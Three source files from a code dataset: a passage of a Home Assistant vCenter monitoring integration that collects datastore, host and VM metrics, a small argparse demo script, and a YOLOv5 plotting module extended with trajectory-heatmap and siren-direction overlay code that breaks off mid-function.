_LOGGER.error(self.msg)
def set_datastore_names(self,value):
self._datastore_names=value
def set_esxi_names(self,value):
self._esxi_names=value
def set_vm_names(self,value):
self._vm_names=value
def hello_vcenter(self):
try:
self.si = SmartConnectNoSSL(
host=self._vchost,
user=self._username,
pwd=self._password,
port=self._port)
hello_content = self.si.RetrieveContent()
for datacenter in hello_content.rootFolder.childEntity:
for ds in datacenter.datastore:
self._vcenter_status['datastore'].append(ds.name)
if hasattr(datacenter.hostFolder, 'childEntity'):
hostFolder = datacenter.hostFolder
computeResourceList = []
computeResourceList = self._getComputeResource(hostFolder,computeResourceList)
for computeResource in computeResourceList:
for host in computeResource.host:
self._vcenter_status['esxi'].append(host.name)
obj = hello_content.viewManager.CreateContainerView(hello_content.rootFolder, [vim.VirtualMachine], True)
for vm in obj.view:
self._vcenter_status['vm'].append(vm.name)
return True, json.dumps(self._vcenter_status,indent=4)
except vmodl.MethodFault as error:
return False, error.msg
except Exception as e:
return False, str(e)
@property
def vcenter_status(self):
return self.success,self.msg
@property
def vcenter_info(self):
return json.dumps(self._data,indent=4)
def _add_data(self,Resource,name,value):
# data = {"endpoint":'S_Vcenter',"metric":metric,"timestamp":self.ts,"step":self._interval,"value":value,"counterType":conterType,"tags":tags}
self._data[Resource][name] = value
self._payload.append(self._data)
def _DatastoreInformation(self,datastore,datacenter_name):
try:
summary = datastore.summary
name = summary.name
TYPE = summary.type
tags = {"datacenter":datacenter_name,"datastore":name,"type":TYPE}
capacity = summary.capacity
# self._add_data("datastore_capacity",capacity,"GAUGE",tags)
freeSpace = summary.freeSpace
# self._add_data("datastore_free",freeSpace,"GAUGE",tags)
freeSpacePercentage = (float(freeSpace) / capacity) * 100
# self._add_data("datastore_freePercent",freeSpacePercentage,"GAUGE",tags)
value={"datastore_capacity":capacity,"datastore_free":freeSpace,"datastore_freePercent":freeSpacePercentage}
self._add_data("datastore",name,value)
except Exception as error:
_LOGGER.error("Unable to access summary for datastore: %s", datastore.name)
_LOGGER.error( error)
pass
def _getComputeResource(self,Folder,computeResourceList):
if hasattr(Folder, 'childEntity'):
for computeResource in Folder.childEntity:
self._getComputeResource(computeResource,computeResourceList)
else:
computeResourceList.append(Folder)
return computeResourceList
def _ComputeResourceInformation(self,computeResource,datacenter_name,content,perf_dict,vchtime,interval):
try:
hostList = computeResource.host
computeResource_name = computeResource.name
for host in hostList:
if (host.name in self._esxi_names) or (len(self._esxi_names) == 0):
self._HostInformation(host,datacenter_name,computeResource_name,content,perf_dict,vchtime,interval)
except Exception as error:
_LOGGER.error("Unable to access information for compute resource: %s", computeResource.name)
_LOGGER.error( error)
pass
def _HostInformation(self,host,datacenter_name,computeResource_name,content,perf_dict,vchtime,interval):
try:
statInt = interval/20
summary = host.summary
stats = summary.quickStats
hardware = host.hardware
tags = "datacenter=" + datacenter_name + ",cluster_name=" + computeResource_name + ",host=" + host.name
uptime = stats.uptime
cpuUsage = 100 * 1000 * 1000 * float(stats.overallCpuUsage) / float(hardware.cpuInfo.numCpuCores * hardware.cpuInfo.hz)
memoryCapacity = hardware.memorySize
memoryUsage = stats.overallMemoryUsage * 1024 * 1024
freeMemoryPercentage = 100 - (
(float(memoryUsage) / memoryCapacity) * 100
)
statNetworkTx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.transmitted.average')), "", host, interval)
networkTx = (float(sum(statNetworkTx[0].value[0].value) * 8 * 1024) / statInt)
statNetworkRx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.received.average')), "", host, interval)
networkRx = (float(sum(statNetworkRx[0].value[0].value) * 8 * 1024) / statInt)
value={"esxi_uptime":uptime,"esxi_cpu_usage":cpuUsage,"esxi_memory_capacity":memoryCapacity,"esxi_memory_usage":memoryUsage,
"esxi_memory_freePercent":freeMemoryPercentage,"esxi_net_if_out":networkTx,"esxi_net_if_in":networkRx}
self._add_data("esxi",host.name,value)
except Exception as error:
_LOGGER.error("Unable to access information for host: %s", host.name)
_LOGGER.error( error)
pass
def _BuildQuery(self,content, vchtime, counterId, instance, entity, interval):
perfManager = content.perfManager
metricId = vim.PerformanceManager.MetricId(counterId=counterId, instance=instance)
startTime = vchtime - timedelta(seconds=(interval + 60))
endTime = vchtime - timedelta(seconds=60)
query = vim.PerformanceManager.QuerySpec(intervalId=20, entity=entity, metricId=[metricId], startTime=startTime,
endTime=endTime)
perfResults = perfManager.QueryPerf(querySpec=[query])
if perfResults:
return perfResults
else:
return False
def _perf_id(self,perf_dict, counter_name):
counter_key = perf_dict[counter_name]
return counter_key
def _VmInfo(self,vm,content,vchtime,interval,perf_dict,tags):
try:
statInt = interval/20
summary = vm.summary
stats = summary.quickStats
uptime = stats.uptimeSeconds
cpuUsage = 100 * float(stats.overallCpuUsage)/float(summary.runtime.maxCpuUsage)
memoryUsage = stats.guestMemoryUsage * 1024 * 1024
memoryCapacity = summary.runtime.maxMemoryUsage * 1024 * 1024
freeMemoryPercentage = 100 - (
(float(memoryUsage) / memoryCapacity) * 100
)
statDatastoreRead = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.read.average')),"*", vm, interval)
if statDatastoreRead!=False:
DatastoreRead = (float(sum(statDatastoreRead[0].value[0].value) * 1024) / statInt)
else:
DatastoreRead = 0
statDatastoreWrite = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.write.average')),"*", vm, interval)
if statDatastoreWrite!=False:
DatastoreWrite = (float(sum(statDatastoreWrite[0].value[0].value) * 1024) / statInt)
else:
DatastoreWrite = 0
statDatastoreIoRead = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.numberReadAveraged.average')),"*", vm, interval)
if statDatastoreIoRead!=False:
DatastoreIoRead = (float(sum(statDatastoreIoRead[0].value[0].value)) / statInt)
else:
DatastoreIoRead = 0
statDatastoreIoWrite = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.numberWriteAveraged.average')),"*", vm, interval)
if statDatastoreIoWrite!=False:
DatastoreIoWrite = (float(sum(statDatastoreIoWrite[0].value[0].value)) / statInt)
else:
DatastoreIoWrite = 0
statDatastoreLatRead = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.totalReadLatency.average')), "*", vm, interval)
if statDatastoreLatRead!=False:
DatastoreLatRead = (float(sum(statDatastoreLatRead[0].value[0].value)) / statInt)
else:
DatastoreLatRead = 0
statDatastoreLatWrite = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'datastore.totalWriteLatency.average')), "*", vm, interval)
if statDatastoreLatWrite!=False:
DatastoreLatWrite = (float(sum(statDatastoreLatWrite[0].value[0].value)) / statInt)
else:
DatastoreLatWrite = 0
statNetworkTx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.transmitted.average')), "", vm, interval)
if statNetworkTx != False:
networkTx = (float(sum(statNetworkTx[0].value[0].value) * 8 * 1024) / statInt)
else:
networkTx = 0
statNetworkRx = self._BuildQuery(content, vchtime, (self._perf_id(perf_dict, 'net.received.average')), "", vm, interval)
if statNetworkRx != False:
networkRx = (float(sum(statNetworkRx[0].value[0].value) * 8 * 1024) / statInt)
else:
networkRx = 0
value={"powerState":vm.runtime.powerState,"vm_uptime":uptime,"vm_cpu_usage":cpuUsage,"vm_memory_capacity":memoryCapacity,"vm_memory_usage":memoryUsage,
"vm_memory_freePercent":freeMemoryPercentage,"vm_net_if_out":networkTx,"vm_net_if_in":networkRx,
"vm_datastore_io_read_bytes":DatastoreRead,"vm_datastore_io_write_bytes":DatastoreWrite,
"vm_datastore_io_read_numbers":DatastoreIoRead,"vm_datastore_io_write_numbers":DatastoreIoWrite,
"vm_datastore_io_read_latency":DatastoreLatRead,"vm_datastore_io_write_latency":DatastoreLatWrite}
self._add_data("vm",vm.name,value)
except Exception as error:
_LOGGER.error("Unable to access information for vm: %s", vm.name)
_LOGGER.error( error)
pass
def run(self,now):
self.ts = int(time.time())
try:
content = self.si.RetrieveContent()
vchtime = self.si.CurrentTime()
perf_dict = {}
perfList = content.perfManager.perfCounter
for counter in perfList:
counter_full = "{}.{}.{}".format(counter.groupInfo.key, counter.nameInfo.key, counter.rollupType)
perf_dict[counter_full] = counter.key
for datacenter in content.rootFolder.childEntity:
datacenter_name = datacenter.name
datastores = datacenter.datastore
for ds in datastores:
if (ds.name in self._datastore_names) or (len(self._datastore_names) == 0):
self._DatastoreInformation(ds,datacenter_name)
if hasattr(datacenter.hostFolder, 'childEntity'):
hostFolder = datacenter.hostFolder
computeResourceList = []
computeResourceList = self._getComputeResource(hostFolder,computeResourceList)
for computeResource in computeResourceList:
self._ComputeResourceInformation(computeResource,datacenter_name,content,perf_dict,vchtime,self._interval)
obj = content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)
for vm in obj.view:
if (vm.name in self._vm_names) or (len(self._vm_names) == 0):
tags = "vm=" + vm.name
if vm.runtime.powerState == "poweredOn":
self._VmInfo(vm, content, vchtime, self._interval, perf_dict, tags)
else:
value={"powerState":vm.runtime.powerState}
self._add_data("vm",vm.name,value)
except vmodl.MethodFault as error:
_LOGGER.error( "Connect Vcenter Error : " + error.msg)
return False, error.msg
return True, "ok"
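# Standalone sketch (run outside Home Assistant); host and credentials are placeholders.
if __name__ == '__main__':
    client = Hello_Esxi('vcenter.local', 'user', 'secret')
    ok, msg = client.vcenter_status
    if ok:
        client.set_datastore_names([])  # empty list = collect every datastore
        client.set_esxi_names([])
        client.set_vm_names([])
        client.run(None)                # one polling pass
        print(client.vcenter_info)      # JSON snapshot of the collected metrics
    else:
        print(msg)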
| syjjx/HA_Esxi | ha_vcenter.py | ha_vcenter.py | py | 25,284 | python | en | code | 10 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "homeassistant.components.sensor.PLATFORM_SCHEMA",
"line_number": 62,
"usage_type": "name"
},
{
... |
29568221843 | # -*- coding: utf-8-*-
'''
First script
'''
from pathlib import Path
import sys
import argparse
pathSearch = Path('.').resolve().as_posix()
sys.path.append(pathSearch)
# -----------------------------------------
description='''This is a description of what the script does.
This script:
- is to show how the 'argparse' module works
- displays the given arguments
'''
def parserFunction():
'''Function parsing command line arguments'''
parser = argparse.ArgumentParser(description = description)
# Add arguments to your module: mandatory (positional) and optional (flagged)
parser.add_argument('rows', type=int, help=u'''Number of rows''')
parser.add_argument('cols', type=int, help=u'''Number of cols''')
parser.add_argument('-p','--somePath', type=str, help=u'''Path to folder''')
args = parser.parse_args()
return args
def main(args):
if args.somePath:
args.fullPath = Path(args.somePath).resolve().as_posix()
print(f'Dictionary of command line arguments:')
for key,val in vars(args).items():
print(f'key = {key}\tvalues = {val}')
print('\n')
# ------------------------------------------
if __name__ == '__main__':
args = parserFunction()
print(f'''\nThe 'args' is of the type:\t{type(args)}\nand it looks like this:\n\t\t\t{args}\n''')
main(args)
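# Example invocation (values are illustrative):
#   $ python testScript.py 3 5 --somePath ./data
# prints the parsed rows/cols and, because --somePath was given, the resolved fullPath.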
| kemal332/entry | testScript.py | testScript.py | py | 1,390 | python | en | code | null | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.path.append",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
... |
20920399171 | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Plotting utils
"""
import math
import os
from copy import copy
from pathlib import Path
import cv2
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sn
import torch
from PIL import Image, ImageDraw, ImageFont
import pdb
from utils.general import (LOGGER, Timeout, check_requirements, clip_coords, increment_path, is_ascii, is_chinese,
try_except, user_config_dir, xywh2xyxy, xyxy2xywh)
from utils.metrics import fitness
import time
# Settings
CONFIG_DIR = user_config_dir() # Ultralytics settings dir
RANK = int(os.getenv('RANK', -1))
matplotlib.rc('font', **{'size': 11})
matplotlib.use('Agg') # for writing to files only
class Colors:
# Ultralytics color palette https://ultralytics.com/
def __init__(self):
# hex = matplotlib.colors.TABLEAU_COLORS.values()
hex = ('FF3838', 'FF9D97', 'FF701F', 'FFB21D', 'CFD231', '48F90A', '92CC17', '3DDB86', '1A9334', '00D4BB',
'2C99A8', '00C2FF', '344593', '6473FF', '0018EC', '8438FF', '520085', 'CB38FF', 'FF95C8', 'FF37C7')
self.palette = [self.hex2rgb('#' + c) for c in hex]
self.n = len(self.palette)
def __call__(self, i, bgr=False):
c = self.palette[int(i) % self.n]
return (c[2], c[1], c[0]) if bgr else c
@staticmethod
def hex2rgb(h): # rgb order (PIL)
return tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
colors = Colors() # create instance for 'from utils.plots import colors'
def check_font(font='Arial.ttf', size=10):
# Return a PIL TrueType Font, downloading to CONFIG_DIR if necessary
font = Path(font)
font = font if font.exists() else (CONFIG_DIR / font.name)
try:
return ImageFont.truetype(str(font) if font.exists() else font.name, size)
except Exception as e: # download if missing
url = "https://ultralytics.com/assets/" + font.name
print(f'Downloading {url} to {font}...')
torch.hub.download_url_to_file(url, str(font), progress=False)
try:
return ImageFont.truetype(str(font), size)
except TypeError:
check_requirements('Pillow>=8.4.0') # known issue https://github.com/ultralytics/yolov5/issues/5374
class Annotator:
if RANK in (-1, 0):
check_font() # download TTF if necessary
# YOLOv5 Annotator for train/val mosaics and jpgs and detect/hub inference annotations
def __init__(self, im, line_width=None, font_size=None, font='Arial.ttf', pil=False, example='abc'):
assert im.data.contiguous, 'Image not contiguous. Apply np.ascontiguousarray(im) to Annotator() input images.'
self.pil = pil or not is_ascii(example) or is_chinese(example)
if self.pil: # use PIL
self.im = im if isinstance(im, Image.Image) else Image.fromarray(im)
self.draw = ImageDraw.Draw(self.im)
self.font = check_font(font='Arial.Unicode.ttf' if is_chinese(example) else font,
size=font_size or max(round(sum(self.im.size) / 2 * 0.035), 12))
else: # use cv2
self.im = im
self.lw = line_width or max(round(sum(im.shape) / 2 * 0.003), 2) # line width
def box_label(self, box, label='', color=(128, 128, 128), txt_color=(255, 255, 255)):
# Add one xyxy box to image with label
if self.pil or not is_ascii(label):
self.draw.rectangle(box, width=self.lw, outline=color) # box
if label:
w, h = self.font.getsize(label) # text width, height
outside = box[1] - h >= 0 # label fits outside box
self.draw.rectangle([box[0],
box[1] - h if outside else box[1],
box[0] + w + 1,
box[1] + 1 if outside else box[1] + h + 1], fill=color)
# self.draw.text((box[0], box[1]), label, fill=txt_color, font=self.font, anchor='ls') # for PIL>8.0
self.draw.text((box[0], box[1] - h if outside else box[1]), label, fill=txt_color, font=self.font)
else: # cv2
p1, p2 = (int(box[0]), int(box[1])), (int(box[2]), int(box[3]))
cv2.rectangle(self.im, p1, p2, color, thickness=self.lw, lineType=cv2.LINE_AA)
if label:
tf = max(self.lw - 1, 1) # font thickness
w, h = cv2.getTextSize(label, 0, fontScale=self.lw / 3, thickness=tf)[0] # text width, height
outside = p1[1] - h - 3 >= 0 # label fits outside box
p2 = p1[0] + w, p1[1] - h - 3 if outside else p1[1] + h + 3
cv2.rectangle(self.im, p1, p2, color, -1, cv2.LINE_AA) # filled
cv2.putText(self.im, label, (p1[0], p1[1] - 2 if outside else p1[1] + h + 2), 0, self.lw / 3, txt_color,
thickness=tf, lineType=cv2.LINE_AA)
def rectangle(self, xy, fill=None, outline=None, width=1):
# Add rectangle to image (PIL-only)
self.draw.rectangle(xy, fill, outline, width)
def text(self, xy, text, txt_color=(255, 255, 255)):
# Add text to image (PIL-only)
w, h = self.font.getsize(text) # text width, height
self.draw.text((xy[0], xy[1] - h + 1), text, fill=txt_color, font=self.font)
def result(self):
# Return annotated image as array
return np.asarray(self.im)
##### Trajectory code #####
def draw_grtr(self, img, positions, width):
for t in range(len(positions) - 1):
cv2.line(img, (round(positions[t][0]), round(positions[t][1])), \
(round(positions[t + 1][0]), round(positions[t + 1][1])), \
color=(255,255,255), thickness=width, lineType=cv2.LINE_AA)
def draw_trajectory(self, diverse_traj_data, blur_size, dets, frame_id, color):
### Ask ###
# draw_start = time.time()
w = dets[:, 2] - dets[:, 0]
h = dets[:, 3] - dets[:, 1]
cxs = dets[:, 0] + (w//2)
y2s = dets[:, 1] + h #
########
traj_mask = np.zeros((self.im.shape[0], self.im.shape[1], 3))
# line_mask = np.zeros((npy_line.shape[0], npy_line.shape[1], 3))
line_mask = np.zeros((self.im.shape[0], self.im.shape[1], 3))
final = None
bot_max = -1
for l in range(len(cxs)):
cx = cxs[l]
y2 = y2s[l]
# if cx >= npy_line.shape[1]:
# cx = npy_line.shape[1] - 1
# if y2 > npy_line.shape[0]:
# y2 = npy_line.shape[0] - 1
if cx >= self.im.shape[1]:
cx = self.im.shape[1] - 1
if y2 > self.im.shape[0]:
y2 = self.im.shape[0] - 1
# draw_fin = time.time()
# print("draw cost: ")
if frame_id in diverse_traj_data.keys():
frame_data = diverse_traj_data[frame_id] # n_samples, num_id, timestep, coordinate (20, 2, 25, 4)
traj_layers = np.zeros((20, self.im.shape[0], self.im.shape[1]), np.uint8)
for i, sample in enumerate(frame_data): # i: sample_id, sample: different_traj in a frame
routes = None
for agent_data in sample:
route = agent_data[:, 2:4]
self.draw_grtr(traj_layers[i], route, 15)
heatmap_layer = np.sum(traj_layers, axis=0).astype(np.uint8)
heatmap_layer = cv2.blur(heatmap_layer, (blur_size, blur_size))
heat = heatmap_layer.copy()
heat[heat>0] = 255
traj_mask[heat==255] = color
index_y, index_x = np.where(heat == 255)[0], np.where(heat == 255)[1]
tra_max = -1
for iy, ix in zip(index_y, index_x):
# if line_mask[iy, ix, 1] == 255 and line_mask[iy, ix, 2] == 0 and iy > tra_max:
if iy > tra_max: # Add new line
tra_max = iy
if tra_max >= 0:
#line_mask[npy_line==1] = (0,255,0)
line_mask[:tra_max, :, [1, 2]] = line_mask[:tra_max, :, [2, 1]]
else:
line_mask = line_mask
heat_gray = cv2.cvtColor(traj_mask.astype(np.uint8), cv2.COLOR_BGR2GRAY)
cnts, hierarchy = cv2.findContours(heat_gray.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
heatmap_layer = cv2.applyColorMap(heatmap_layer, cv2.COLORMAP_HOT)
final_1 = cv2.addWeighted(line_mask.astype(np.uint8), 1, self.im, 1, 0)
final_2 = cv2.addWeighted(traj_mask.astype(np.uint8), 1, self.im, 1, 0)
final = cv2.addWeighted(final_1, 0.5, final_2, 0.5, 0)
cv2.drawContours(final, cnts, -1, (0, 0, 0), 1, lineType=cv2.LINE_AA)
else:
final = cv2.addWeighted(line_mask.astype(np.uint8), 1, self.im, 1, 0)
#final_2 = image
heat = np.zeros((self.im.shape[0], self.im.shape[1]))
#final = cv2.resize(final, (0,0), fx = 0.5, fy = 0.5)
self.im = final
###########
##### Sound Signal code #####
def addTogether(self, car, x, y, type='icon'): # self.im is the background, car is the overlay image, (x, y) is its position on the background
rows,cols,channels = car.shape # unpack the image dimensions
# Convert colour space
img_hsv = cv2.cvtColor(car,cv2.COLOR_RGB2HSV) # convert to HSV for foreground extraction
# Foreground extraction
lower_blue=np.array([0,0,0]) # lower threshold
#upper_blue=np.array([0,255,255]) # upper threshold
upper_color = np.array([0,0,0])
if type == 'car':
upper_color = np.array([0,255,255])
else:
upper_color = np.array([255,0,0])
mask = cv2.inRange(img_hsv, lower_blue, upper_color) # build the mask
erode=cv2.erode(mask,None,iterations=3) # erosion
dilate=cv2.dilate(erode,None,iterations=1) # dilation
opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (8,8))) # morphological opening
#======== Merge the images ========
center = [y,x] # starting position of the overlay on the background
for i in range(rows):
for j in range(cols):
if opening[i,j]==0: # black pixel in the mask
self.im[center[0]+i,center[1]+j] =car[i,j] # copy the pixel colour
def sound_signal(self, data): # Add signal
# Load the car image
#global tmp # Take the global var tmp
car = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/car.png') # load the car icon
car = cv2.resize(car,(0,0),fx=0.4,fy=0.4) # 0.15, 0.15
# Load the emergency-vehicle icons
amb = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/type_icon/amb.png') # load the ambulance icon
#pdb.set_trace()
amb = cv2.resize(amb,(0,0),fx=1.2,fy=1.2)
#pdb.set_trace()
fire = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/type_icon/fire.png') # load the fire-engine icon
#pdb.set_trace()
fire = cv2.resize(fire,(0,0),fx=1.2,fy=1.2)
police = cv2.imread('/home/ziyan/Yolov5_DeepSort_Pytorch_ros/Yolov5_DeepSort_Pytorch/icon_imgs/type_icon/police.png') # load the police icon
#pdb.set_trace()
police = cv2.resize(police,(0,0),fx=1.2,fy=1.2)
#================ Initialise coordinates ================
x = int(0.1*self.im.shape[1]) # x coordinate of the circle centre, a fraction of the image width; shape=(height,width,channel)
y = int(0.8*self.im.shape[0]) # y coordinate of the circle centre
r = int(0.15*self.im.shape[0]) # radius of the circle
#================ Draw the circles ================
cv2.circle(self.im,(x,y),r,(84,46,8),-1)
m = 3 # draw m concentric circles
r_circle = r/m
for i in range(1,m+1):
cv2.circle(self.im,(x,y),int(r_circle*i),(255,255,255),1)
#================ Draw the spokes ================
# draw one line every degree_line degrees
# line endpoint coordinates (x_line, y_line)
n = 12 # divide the circle into n equal sectors
degree_line = 360/n # draw a line every degree_line degrees
#print("degree_line:"+str(degree_line))
for i in range(n):
theta_line = ((i*degree_line)/180)*math.pi # degrees to radians
x_line = int(x + r*math.cos(theta_line))
y_line = int(y - r*math.sin(theta_line))
cv2.line(self.im,(x,y),(x_line,y_line),(250,255,255),1)
#===========================================
# Bearing: the angle selects one of the n sectors (the sector is drawn as a filled ellipse whose axes equal the circle radius)
angle, label_type = (int(v) for v in data.split(',')) # parse "bearing,label" into integers (string values would otherwise break the arithmetic below)
label_list = [2,3,4]
if label_type in label_list:
### Select a specific signal
p = (12 - angle // 30) % 12 # 330->11->1, 30->1->11
#p = 7 # 7*30
#p = np.random.randint(0,n) # randomly pick one of the n sectors -> Also, the pic being selected is not in the correct order (Double random)
#print("p:"+str(p))
degree_elli_start = p * degree_line # degree_line=360/n # start angle
degree_elli_end = (p+1) * degree_line # end angle
# cv2.ellipse(image, centre, (major axis, minor axis), rotation (clockwise), start angle (clockwise), end angle (clockwise), colour, thickness)
cv2.ellipse(self.im,(x,y),(r,r),0,-degree_elli_start,-degree_elli_end,(0,215,255),-1)
# x,y
self.addTogether(car, x - car.shape[1]//2, y - car.shape[0]//2, type='car')
if label_type == 2: # police
self.addTogether(police, 2*x,y - police.shape[0]//2)
elif label_type == 3: # fire
self.addTogether(fire, 2*x,y - fire.shape[0]//2)
elif label_type == 4: # amb
self.addTogether(amb, 2*x,y - amb.shape[0]//2)
#return draw_img
###########
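# Note on sound_signal()'s sector arithmetic (a sketch of the mapping, for clarity):
# with n=12 wedges of 30 degrees each, a bearing maps to wedge p = (12 - angle // 30) % 12,
# so angle=30 -> p=11 and angle=330 -> p=1; the negated angles passed to cv2.ellipse()
# flip OpenCV's clockwise convention so the highlighted wedge matches the bearing.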
def feature_visualization(x, module_type, stage, n=32, save_dir=Path('runs/detect/exp')):
"""
x: Features to be visualized
module_type: Module type
stage: Module stage within model
n: Maximum number of feature maps to plot
save_dir: Directory to save results
"""
if 'Detect' not in module_type:
batch, channels, height, width = x.shape # batch, channels, height, width
if height > 1 and width > 1:
f = save_dir / f"stage{stage}_{module_type.split('.')[-1]}_features.png" # filename
blocks = torch.chunk(x[0].cpu(), channels, dim=0) # select batch index 0, block by channels
n = min(n, channels) # number of plots
fig, ax = plt.subplots(math.ceil(n / 8), 8, tight_layout=True) # 8 rows x n/8 cols
ax = ax.ravel()
plt.subplots_adjust(wspace=0.05, hspace=0.05)
for i in range(n):
ax[i].imshow(blocks[i].squeeze()) # cmap='gray'
ax[i].axis('off')
print(f'Saving {f}... ({n}/{channels})')
plt.savefig(f, dpi=300, bbox_inches='tight')
plt.close()
np.save(str(f.with_suffix('.npy')), x[0].cpu().numpy()) # npy save
def hist2d(x, y, n=100):
# 2d histogram used in labels.png and evolve.png
xedges, yedges = np.linspace(x.min(), x.max(), n), np.linspace(y.min(), y.max(), n)
hist, xedges, yedges = np.histogram2d(x, y, (xedges, yedges))
xidx = np.clip(np.digitize(x, xedges) - 1, 0, hist.shape[0] - 1)
yidx = np.clip(np.digitize(y, yedges) - 1, 0, hist.shape[1] - 1)
return np.log(hist[xidx, yidx])
def butter_lowpass_filtfilt(data, cutoff=1500, fs=50000, order=5):
from scipy.signal import butter, filtfilt
# https://stackoverflow.com/questions/28536191/how-to-filter-smooth-with-scipy-numpy
def butter_lowpass(cutoff, fs, order):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
return butter(order, normal_cutoff, btype='low', analog=False)
b, a = butter_lowpass(cutoff, fs, order=order)
return filtfilt(b, a, data) # forward-backward filter
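# Usage sketch for the filter above: zero-phase smoothing of a noisy 1-D series.
#   y = np.cumsum(np.random.randn(1000))   # synthetic noisy signal
#   y_smooth = butter_lowpass_filtfilt(y)  # defaults: cutoff=1500, fs=50000, order=5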
def output_to_target(output):
# Convert model output to target format [batch_id, class_id, x, y, w, h, conf]
targets = []
for i, o in enumerate(output):
for *box, conf, cls in o.cpu().numpy():
targets.append([i, cls, *list(*xyxy2xywh(np.array(box)[None])), conf])
return np.array(targets)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=1920, max_subplots=16):
# Plot image grid with labels
if isinstance(images, torch.Tensor):
images = images.cpu().float().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
if np.max(images[0]) <= 1:
images *= 255 # de-normalise (optional)
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Build Image
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8) # init
for i, im in enumerate(images):
if i == max_subplots: # if last batch has fewer images than we expect
break
x, y = int(w * (i // ns)), int(h * (i % ns)) # block origin
im = im.transpose(1, 2, 0)
mosaic[y:y + h, x:x + w, :] = im
# Resize (optional)
scale = max_size / ns / max(h, w)
if scale < 1:
h = math.ceil(scale * h)
w = math.ceil(scale * w)
mosaic = cv2.resize(mosaic, tuple(int(x * ns) for x in (w, h)))
# Annotate
fs = int((h + w) * ns * 0.01) # font size
annotator = Annotator(mosaic, line_width=round(fs / 10), font_size=fs, pil=True)
for i in range(i + 1):
x, y = int(w * (i // ns)), int(h * (i % ns)) # block origin
annotator.rectangle([x, y, x + w, y + h], None, (255, 255, 255), width=2) # borders
if paths:
annotator.text((x + 5, y + 5 + h), text=Path(paths[i]).name[:40], txt_color=(220, 220, 220)) # filenames
if len(targets) > 0:
ti = targets[targets[:, 0] == i] # image targets
boxes = xywh2xyxy(ti[:, 2:6]).T
classes = ti[:, 1].astype('int')
labels = ti.shape[1] == 6 # labels if no conf column
conf = None if labels else ti[:, 6] # check for confidence presence (label vs pred)
if boxes.shape[1]:
if boxes.max() <= 1.01: # if normalized with tolerance 0.01
boxes[[0, 2]] *= w # scale to pixels
boxes[[1, 3]] *= h
elif scale < 1: # absolute coords need scale if image scales
boxes *= scale
boxes[[0, 2]] += x
boxes[[1, 3]] += y
for j, box in enumerate(boxes.T.tolist()):
cls = classes[j]
color = colors(cls)
cls = names[cls] if names else cls
if labels or conf[j] > 0.25: # 0.25 conf thresh
label = f'{cls}' if labels else f'{cls} {conf[j]:.1f}'
annotator.box_label(box, label, color=color)
annotator.im.save(fname) # save
def plot_lr_scheduler(optimizer, scheduler, epochs=300, save_dir=''):
# Plot LR simulating training for full epochs
optimizer, scheduler = copy(optimizer), copy(scheduler) # do not modify originals
y = []
for _ in range(epochs):
scheduler.step()
y.append(optimizer.param_groups[0]['lr'])
plt.plot(y, '.-', label='LR')
plt.xlabel('epoch')
plt.ylabel('LR')
plt.grid()
plt.xlim(0, epochs)
plt.ylim(0)
plt.savefig(Path(save_dir) / 'LR.png', dpi=200)
plt.close()
def plot_val_txt(): # from utils.plots import *; plot_val()
# Plot val.txt histograms
x = np.loadtxt('val.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6), tight_layout=True)
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6), tight_layout=True)
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.plots import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8), tight_layout=True)
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label=f'{x[i].mean():.3g} +/- {x[i].std():.3g}')
ax[i].legend()
ax[i].set_title(s[i])
plt.savefig('targets.jpg', dpi=200)
def plot_val_study(file='', dir='', x=None): # from utils.plots import *; plot_val_study()
# Plot file=study.txt generated by val.py (or plot all study*.txt in dir)
save_dir = Path(file).parent if file else Path(dir)
plot2 = False # plot additional results
if plot2:
